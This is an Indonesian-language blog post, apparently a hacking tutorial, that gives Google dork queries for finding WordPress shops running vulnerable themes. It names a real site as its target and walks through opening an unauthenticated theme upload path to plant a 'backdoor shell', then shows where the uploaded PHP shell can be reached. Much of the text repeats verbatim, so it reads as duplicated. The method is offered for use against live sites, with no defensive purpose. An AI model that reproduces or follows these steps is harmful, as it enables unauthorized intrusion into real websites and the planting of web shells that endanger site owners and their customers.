Bahan bahan :
Google Dork :
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/emporium
"Storebox by" intext:dress -> dress bisa diganti dengan kata-kata yang berhubungan dengan belanja, bisa Shoes, Jacket, dll.
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/emporium
"Storebox by" intext:dress -> dress bisa diganti dengan kata-kata yang berhubungan dengan belanja, bisa Shoes, Jacket, dll.
Silahkan dikembangkan sendiri.
Langsung saja tuh dork tempelin di google. Nyarinya yang sabar. Kali ini saya pilih : http://shopshack.net .
Lalu lihat suorce dari shopshack.net . Bisa dengan ctrl+u atau klik kanan - view source.
Lihat baris wp-content/themes .
Contoh : http://shopshack.net/wp-content/themes/framework/library/js/jquery-1.3.2.min.js
Buka link tersebut dan ubah menjadi
http://shopshack.net/wp-content/themes/framework/upload
Intinya, setelah nama themes diganti dengan /upload/.
Maka kalian akan melihat tempat upload. Kali 404 Not Found ya berarti anda kurang ganteng alias faktor face. Cari target lain. :p
Nih SS nya :
Upload backdoor shell kalian disitu. Tunggu sampai loadingnya selesai.
Jika sudah, lihat shellnya di : [localhost]/wp-content/uploads/products_img/[namashell].php
Lalu lihat suorce dari shopshack.net . Bisa dengan ctrl+u atau klik kanan - view source.
Lihat baris wp-content/themes .
Contoh : http://shopshack.net/wp-content/themes/framework/library/js/jquery-1.3.2.min.js
Buka link tersebut dan ubah menjadi
http://shopshack.net/wp-content/themes/framework/upload
Intinya, setelah nama themes diganti dengan /upload/.
Maka kalian akan melihat tempat upload. Kali 404 Not Found ya berarti anda kurang ganteng alias faktor face. Cari target lain. :p
Nih SS nya :
 |
| Tempat Upload |
Upload backdoor shell kalian disitu. Tunggu sampai loadingnya selesai.
Jika sudah, lihat shellnya di : [localhost]/wp-content/uploads/products_img/[namashell].php
Tidak ada komentar:
Posting Komentar